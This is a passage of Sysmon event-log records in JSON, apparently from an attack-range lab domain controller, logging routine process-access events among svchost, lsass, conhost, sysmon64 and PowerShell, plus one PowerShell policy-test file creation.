07:58:55.736","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4554,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.736\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.736","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4555,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.736\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.736","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4556,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.736\r\nSourceProcessGUID: {41C8662E-20BF-5F25-0000-001074C30600}\r\nSourceProcessId: 5076\r\nSourceThreadId: 4416\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20BF-5F25-0000-001085C60600}\r\nTargetProcessId: 4168\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.736","SourceProcessGUID":"{41C8662E-20BF-5F25-0000-001074C30600}","SourceProcessId":"5076","SourceThreadId":"4416","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20BF-5F25-0000-001085C60600}","TargetProcessId":"4168","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4557,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.751\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.751","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4558,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.751\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.751","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4559,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.751\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.751","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4560,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.767\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-20BF-5F25-0000-001085C60600}\r\nTargetProcessId: 4168\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.767","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-20BF-5F25-0000-001085C60600}","TargetProcessId":"4168","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4561,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.767\r\nProcessGuid: {41C8662E-20BF-5F25-0000-001085C60600}\r\nProcessId: 4168\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_vidcjvo3.mvq.ps1\r\nCreationUtcTime: 2020-08-01 07:58:55.767","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.767","ProcessGuid":"{41C8662E-20BF-5F25-0000-001085C60600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_vidcjvo3.mvq.ps1","CreationUtcTime":"2020-08-01 07:58:55.767","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4562,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.814\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-20BF-5F25-0000-001085C60600}\r\nTargetProcessId: 4168\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 